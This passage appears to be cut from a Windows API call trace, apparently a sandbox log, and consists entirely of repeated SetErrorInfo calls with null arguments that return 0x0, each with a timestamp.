[0061.501] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.502] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.502] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.502] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.502] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.502] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.502] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.502] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.502] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.502] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.502] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.502] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.503] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.503] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.503] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.503] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.503] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.503] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.503] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.503] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.503] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.503] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.503] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.504] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.504] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.504] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.504] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.504] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.504] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.504] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.504] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.504] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.504] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.504] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.505] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.505] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.505] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.505] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.505] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.505] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.505] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.505] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.505] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.505] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.505] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.505] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.506] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.506] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.506] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.506] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.506] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.506] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.506] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.506] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.506] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.506] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.506] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.506] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.507] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.507] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.507] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.507] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.507] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.507] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.507] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.507] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.507] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.508] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.508] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.508] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.508] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.508] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.508] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.508] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.508] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.508] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.508] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.509] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.509] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.509] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.509] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.509] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.509] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.509] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.509] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.509] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.509] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.509] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.509] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.509] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.510] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.510] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.510] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.510] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.510] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.510] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.510] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.510] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.510] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.510] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.510] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.511] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.511] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.511] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.511] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.511] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.511] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.511] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.511] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.511] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.511] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.511] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.511] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.512] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.512] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.512] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.512] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.512] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.512] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.512] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.512] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.512] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.512] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.513] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.513] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.513] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.513] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.513] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.513] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.513] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.513] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.514] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.514] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.514] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.514] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.514] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.514] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.514] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.514] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.515] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.515] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.515] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.515] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.515] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.515] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.515] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.515] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.515] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.515] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.515] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.515] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.515] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.516] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.516] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.516] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.516] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.516] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.516] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.516] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.516] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.516] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.516] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.516] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.517] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.517] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.517] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.517] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.517] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.517] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.517] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.517] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.517] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.517] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.517] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.518] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.518] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.518] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.518] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.518] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.518] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.519] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.519] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.519] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.519] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.519] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.520] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.520] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.520] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.520] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.521] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.521] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.521] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.521] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.521] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.521] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.522] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.522] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.522] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.522] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.522] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.523] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.523] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.523] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.523] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.523] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.523] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.524] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.524] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.524] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.524] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.524] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.524] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.525] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.525] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.525] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.525] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.526] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.526] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.526] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.526] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.527] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.527] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.527] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.527] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.527] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.527] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.527] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.527] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.528] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.528] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.528] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.528] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.528] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.528] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.529] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.529] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.529] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.530] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.530] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.530] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.530] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.531] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.531] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.531] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.531] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.531] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.532] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.532] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.532] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.532] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.532] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.532] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.533] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.533] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.533] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.533] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.534] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.534] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.534] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.534] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.534] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.535] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.535] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.535] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.535] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.536] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.536] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.536] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.536] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.536] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.536] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.536] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.537] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.537] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.537] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.537] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.537] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.537] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.537] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.537] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.537] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.537] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.537] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.537] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.538] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.538] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.538] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.538] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.538] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.538] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.538] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.538] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.539] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.539] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.539] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.540] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.541] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.541] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.541] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.541] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.541] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.541] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.542] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.542] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.542] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.542] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.542] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.543] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.543] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.543] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.543] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.543] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.543] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.543] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.543] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.543] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.544] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.544] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.544] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.544] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.544] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.544] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.544] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.544] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.544] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.544] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.544] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.544] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.544] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.544] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.544] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.544] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.544] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.544] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.544] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.544] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.544] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.544] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.549] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.549] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.549] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.549] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.549] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.550] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.550] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.550] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.550] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.550] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.550] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.550] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.550] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.550] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.550] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.550] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.550] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.550] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.550] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
